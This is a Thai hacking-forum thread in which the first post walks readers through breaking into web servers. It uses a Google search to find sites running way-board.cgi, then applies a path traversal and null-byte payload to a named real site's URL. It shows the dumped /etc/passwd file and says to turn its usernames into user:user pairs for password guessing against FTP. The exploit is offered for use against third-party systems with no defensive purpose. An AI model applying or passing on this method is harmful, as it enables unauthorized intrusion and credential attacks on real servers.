Results 1 to 2 of 2

Thread: วิธีพื้นฐานแบบดั่งเดิมหา shell ใช้

  1. #1
    Junior Member
    Join Date
    Oct 2006
    Posts
    8


    วิธีพื้นฐานแบบดั่งเดิมหา shell ใช้

    ลำดับแรกใช้ google ให้เป็นประโยชน์
    ค้นหา Bug cgi

    http://www.google.co.th/search?hl=th&q...Akr&num=100

    หา url ที่มี way-board.cgi?db= ต่อท้าย
    นำ url มาสร้างเป็น list
    เช่น
    http://4972.co.kr/way-board/way-board.cgi?db=story
    เราก็นำคำสั่ง
    ../../../../../../etc/passwd%00
    มาต่อท้ายก็จะได้

    http://4972.co.kr/way-board/way-board.cgi?..../etc/passwd%00

    ผลที่ได้เมื่อเปิดหน้าเว็บคือ
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    news:x:9:13:news:/etc/news:
    uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
    operator:x:11:0perator:/root:/sbin/nologin
    games:x:12:100:games:/usr/games:/sbin/nologin
    gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
    ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
    nobody:x:99:99:Nobody:/:/sbin/nologin
    rpm:x:37:37::/var/lib/rpm:/bin/bash
    vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
    nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
    sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
    rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
    mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
    smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
    ...............................................อีกยาว

    นำชื่อ user มา list เป็น user:user เช่น
    root:root
    games:games
    news:news
    ..............................
    Save ไฟล์
    นำไฟล์ user ที่ได้ไปยิงพาสแนะนำให้ยิงใส่พอร์ต FTP

  2. #2
    Junior Member
    Join Date
    Oct 2006
    Posts
    3


    อิอิ ที่พิมพ์ มาผมงง หมดเลยครับ มันเอาไปใช้ไรได้มั่งอ่ะ ประดับฟามรู้

Similar Threads

  1. R57 shell ver 1.5
    By Gen0TypE in forum Security Tools
    Replies: 3
    Last Post: 22-09-2008, 11:03 AM
  2. JSP Web Shell
    By snapter in forum Security Tools
    Replies: 1
    Last Post: 11-09-2008, 08:04 AM
  3. การใช้ Netcat เป็น BackDoor ทั้ง blind shell และ reverse shell
    By lucifer in forum Hacking, Exploit Articles/Tutorial/Techniques
    Replies: 1
    Last Post: 19-02-2008, 01:42 AM
  4. Shell คือ...
    By masternikkk in forum บทความ คอมพิวเตอร์ ทัวไป
    Replies: 0
    Last Post: 09-10-2007, 03:55 AM
  5. UNIX shell programming featuring korn shell u3711
    By conanjung in forum E-Book, Video หรือบทความทั่วไปด้าน Computer
    Replies: 0
    Last Post: 26-09-2007, 06:04 PM

Members who have read this thread : 0

Actions : (View-Readers)

There are no names to display.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •